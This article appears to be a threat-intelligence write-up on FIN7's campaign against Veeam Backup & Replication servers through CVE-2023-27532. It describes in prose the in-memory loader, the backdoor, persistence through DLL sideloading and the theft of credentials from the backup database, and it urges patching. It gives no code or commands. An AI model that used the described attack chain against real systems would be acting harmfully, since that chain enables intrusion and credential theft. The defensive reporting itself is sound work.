Introduction
The cybersecurity landscape is a battleground where organizations continuously defend their data from persistent adversaries. Among the most notorious of these adversaries is the financially motivated cybercrime group known as FIN7, also referred to as Carbon Spider. This group has been in operation since at least 2013 and has been associated with the Carbanak malware family. The group was known in its early years for launching malware attacks against organizations from the retail, restaurant, and hospitality sectors with the goal of stealing credit card information. However, FIN7 has also expanded into ransomware, being associated with the Darkside and BlackMatter ransomware families, and more recently BlackCat/ALPHV.
Recently, FIN7 has turned its focus onto a new target: Veeam Backup & Replication servers. Veeam Backup & Replication is a backup and disaster recovery solution that provides data protection for virtual, physical, and cloud-based workloads. It is widely used by organizations of all sizes to protect their critical data. However, the recent attacks by FIN7 highlight the importance of promptly patching vulnerabilities in enterprise software and ensuring that servers are not publicly accessible over the internet, especially if they contain sensitive data.
Vulnerability Exploited by FIN7
The vulnerability that is suspected to have been exploited by FIN7 is tracked as CVE-2023-27532. This flaw, patched by Veeam on March 7, 2023, allows an unauthenticated user who can connect to the server on TCP port 9401 to extract credentials stored in the server’s configuration database and potentially gain access to the server host system. Notably, a proof-of-concept (POC) exploit for this vulnerability was made publicly available on 23rd March 2023, a few days prior to the campaign. The POC contains remote command execution functionality, achieved through SQL shell commands, which yields the same execution chain observed in the campaign led by FIN7.
Attack Methodology
Forensic analysis on the compromised Veeam servers shows a sequence of events that paints a clear picture of FIN7’s approach. The SQL Server process “sqlservr.exe”, related to the Veeam Backup instance, was used to execute a batch shell script. This script downloaded and executed a PowerShell script directly in memory. This PowerShell script, known as POWERTRASH, is an obfuscated malware loader attributed to FIN7 in the past. This PowerShell-based loader is designed to unpack embedded payloads and execute them on the system using a technique known as reflective PE injection. A tool known as DICELOADER or Lizar, previously associated with FIN7, was also observed in the recent attacks against Veeam servers.
The DICELOADER backdoor allowed the attackers to deploy additional custom bash scripts and PowerShell scripts. Some of these scripts were identical to those used by FIN7 in other attacks. For example, some scripts collected information about the local system such as running processes, opened network connections, listening ports, and IP configuration. Another script used the Windows Instrumentation Interface to remotely collect information about other systems on the network. Yet another script that is known to be part of FIN7’s arsenal was used to resolve the collected IP addresses to local hosts that identified the computers on the network.
Persistence and Lateral Movement
An interesting aspect of FIN7’s attack was their method of establishing persistence. A custom script called gup18.ps1, which hasn’t been observed before, was used to set up a persistence mechanism. This ensured that the DICELOADER backdoor starts on system reboot. The backdoor execution is achieved through DLL sideloading against an executable file called gup.exethat’s part of a legitimate application called Notepad++. The attackers deliver both the legitimate gup.exe along with its configuration file and a maliciously modified library called libcurl.dll that gup.exe is designed to execute. This library then decodes the DICELOADER payload from another file and executes it.
The attackers also executed Veeam-specific commands. For example, they used SQL commands to steal information from the Veeam backup database and a custom script to retrieve passwords from the server. This highlights FIN7’s understanding of the specific software they were targeting and their ability to tailor their approach accordingly.
In summary, the FIN7 cybercrime group’s campaign against Veeam Backup & Replication servers underlines the importance of continuous monitoring and patching of enterprise software. Organizations need to be vigilant and proactive in their cybersecurity efforts, especially when dealing with threats from sophisticated and persistent threat actors like FIN7.